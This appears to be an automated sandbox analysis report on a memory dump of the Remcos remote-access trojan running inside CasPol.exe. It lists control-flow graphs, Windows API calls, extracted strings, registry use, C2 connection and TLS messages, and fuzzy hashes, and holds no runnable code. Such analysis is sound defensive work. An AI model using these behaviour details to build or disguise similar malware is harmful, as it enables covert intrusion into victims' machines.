call 401f04 call 413a23 call 401f09 * 2 100->126 108 40ec76-40ec89 call 401e65 call 401fab 104->108 109 40ec39 call 407716 104->109 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 117 40ec3e-40ec40 109->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->108 141 40ec61-40ec67 121->141 156 40f3a5-40f3af call 40dd42 call 414f2a 126->156 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 204 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->204 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->234 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->183 184 40ee0f-40ee19 call 409057 181->184 190 40ee1e-40ee42 call 40247c call 434798 183->190 184->190 211 40ee51 190->211 212 40ee44-40ee4f call 436e90 190->212 204->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 211->217 212->217 272 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->272 286 40efc1 234->286 287 40efdc-40efde 234->287 272->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 272->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->234 306 40eeef 288->306 295 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->295 290->289 291->295 344 40f101 295->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 295->345 306->93 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 357 40f159-40f16c call 401e65 call 401fab 346->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->358 367 40f1cc-40f1df call 401e65 call 401fab 357->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->368 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 405 40f264-40f26b 401->405 406 40f258-40f262 CreateThread 401->406 410 40f279-40f280 405->410 411 40f26d-40f277 CreateThread 405->411 406->405 412 40f282-40f285 410->412 413 40f28e 410->413 411->410 415 40f287-40f28c 412->415 416 40f2cc-40f2df call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 425 40f2e4-40f2e7 416->425 418->416 425->156 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 425->427 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                            APIs
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                              • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                              • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                              • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040E9EE
                              • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                            • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                            • API String ID: 2830904901-972522952
                            • Opcode ID: 30c98d85052ffbff03e9993bd8104adc494a48be42afa8666ff44a65e52adbf7
                            • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                            • Opcode Fuzzy Hash: 30c98d85052ffbff03e9993bd8104adc494a48be42afa8666ff44a65e52adbf7
                            • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                            Function 00414F2A Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809sleepnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 566 415210-415225 call 404f51 call 4048c8 560->566 567 4151e5-41520b call 402093 * 2 call 41b4ef 560->567 582 415aa3-415ab5 call 404e26 call 4021fa 561->582 566->582 583 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 566->583 567->582 597 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 582->597 598 415add-415ae5 call 401e8d 582->598 648 415380-41538d call 405aa6 583->648 649 415392-4153b9 call 401fab call 4135a6 583->649 597->598 598->477 648->649 655 4153c0-41577f call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->655 656 4153bb-4153bd 649->656 782 415781 call 404aa1 655->782 656->655 783 415786-415a0a call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a0f-415a16 783->901 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 904 415a21-415a23 902->904 905 415a33-415a38 call 40b051 903->905 906 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->906 904->903 905->906 917 415a71-415a7d CreateThread 906->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 906->918 917->918 918->582
                            APIs
                            • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                            • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                            • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$ErrorLastLocalTime
                            • String ID: | $%I64u$5.1.0 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                            • API String ID: 524882891-1963623886
                            • Opcode ID: de291bc130383025817121ebc17e10697a1bf1b5d4139111e3b17213d67bbabe
                            • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                            • Opcode Fuzzy Hash: de291bc130383025817121ebc17e10697a1bf1b5d4139111e3b17213d67bbabe
                            • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                            Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • connect.WS2_32(?,?,?), ref: 004048E0
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                            • WSAGetLastError.WS2_32 ref: 00404A21
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                            • API String ID: 994465650-2151626615
                            • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                            • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                            • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                            • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                            Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1000 40da34-40da59 call 401f86 1003 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1000->1003 1004 40da5f 1000->1004 1027 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1003->1027 1006 40da70-40da7e call 41b5b4 call 401f13 1004->1006 1007 40da91-40da96 1004->1007 1008 40db51-40db56 1004->1008 1009 40daa5-40daac call 41bfb7 1004->1009 1010 40da66-40da6b 1004->1010 1011 40db58-40db5d 1004->1011 1012 40da9b-40daa0 1004->1012 1013 40db6e 1004->1013 1014 40db5f-40db64 call 43c0cf 1004->1014 1031 40da83 1006->1031 1016 40db73-40db78 call 43c0cf 1007->1016 1008->1016 1028 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1009->1028 1029 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1009->1029 1010->1016 1011->1016 1012->1016 1013->1016 1022 40db69-40db6c 1014->1022 1030 40db79-40db7e call 409057 1016->1030 1022->1013 1022->1030 1028->1031 1036 40da87-40da8c call 401f09 1029->1036 1030->1003 1031->1036 1036->1003
                            APIs
                            • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: LongNamePath
                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                            • API String ID: 82841172-425784914
                            • Opcode ID: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                            • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                            • Opcode Fuzzy Hash: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                            • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                            Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1100 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1111 41b35d-41b366 1100->1111 1112 41b31c-41b32b call 4135a6 1100->1112 1114 41b368-41b36d 1111->1114 1115 41b36f 1111->1115 1117 41b330-41b347 call 401fab StrToIntA 1112->1117 1116 41b374-41b37f call 40537d 1114->1116 1115->1116 1122 41b355-41b358 call 401fd8 1117->1122 1123 41b349-41b352 call 41cf69 1117->1123 1122->1111 1123->1122
                            APIs
                              • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                              • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                              • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                              • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                            • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCurrentOpenProcessQueryValue
                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            • API String ID: 1866151309-2070987746
                            • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                            • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                            • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                            • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                            Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountEventTick
                            • String ID: !D@$NG
                            • API String ID: 180926312-2721294649
                            • Opcode ID: d8b340ea6d4709a026dcc371673bc56ec9942c34c40e93aa1caf0058373bc741
                            • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                            • Opcode Fuzzy Hash: d8b340ea6d4709a026dcc371673bc56ec9942c34c40e93aa1caf0058373bc741
                            • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                            Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1265 404f51-404f5f 1266 404f65-404f6c 1265->1266 1267 404fea 1265->1267 1269 404f74-404f7b 1266->1269 1270 404f6e-404f72 1266->1270 1268 404fec-404ff1 1267->1268 1271 404fc0-404fe8 CreateEventA CreateThread 1269->1271 1272 404f7d-404fbb GetLocalTime call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1269->1272 1270->1271 1271->1268 1272->1271
                            APIs
                            • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                            Strings
                            • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Create$EventLocalThreadTime
                            • String ID: KeepAlive | Enabled | Timeout:
                            • API String ID: 2532271599-1507639952
                            • Opcode ID: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
                            • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                            • Opcode Fuzzy Hash: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
                            • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                            Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1282 41376f-413786 RegCreateKeyA 1283 413788-4137bd call 40247c call 401fab RegSetValueExA RegCloseKey 1282->1283 1284 4137bf 1282->1284 1286 4137c1-4137cf call 401fd8 1283->1286 1284->1286
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                            • RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137A6
                            • RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: pth_unenc
                            • API String ID: 1818849710-4028850238
                            • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                            • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                            • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                            • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                            Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                            • CreateThread.KERNELBASE(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                            • FindCloseChangeNotification.KERNELBASE(?,?,00000000), ref: 00404DDB
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                            • String ID:
                            • API String ID: 2579639479-0
                            • Opcode ID: 86f3e289ee87dd2070e95c4c7186b2520882cd19ee190badebe9b582a3aec49f
                            • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                            • Opcode Fuzzy Hash: 86f3e289ee87dd2070e95c4c7186b2520882cd19ee190badebe9b582a3aec49f
                            • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                            Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1340 40d069-40d095 call 401fab CreateMutexA GetLastError
                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                            • GetLastError.KERNEL32 ref: 0040D083
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastMutex
                            • String ID: SG
                            • API String ID: 1925916568-3189917014
                            • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                            • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                            • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                            • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                            Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1343 4135a6-4135d2 RegOpenKeyExA 1344 4135d4-4135fc RegQueryValueExA RegCloseKey 1343->1344 1345 413607 1343->1345 1346 413609 1344->1346 1347 4135fe-413605 1344->1347 1345->1346 1348 41360e-41361a call 402093 1346->1348 1347->1348
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                            • RegCloseKey.KERNELBASE(?), ref: 004135F2
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                            • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                            • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                            • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                            Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1351 4136f8-41371c RegOpenKeyExA 1352 413768 1351->1352 1353 41371e-413740 RegQueryValueExA RegCloseKey 1351->1353 1354 41376a-41376e 1352->1354 1353->1352 1355 413742-413766 call 406cb7 call 406d3c 1353->1355 1355->1354
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                            • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                            • RegCloseKey.KERNELBASE(00000000), ref: 00413738
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                            • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                            • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                            • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
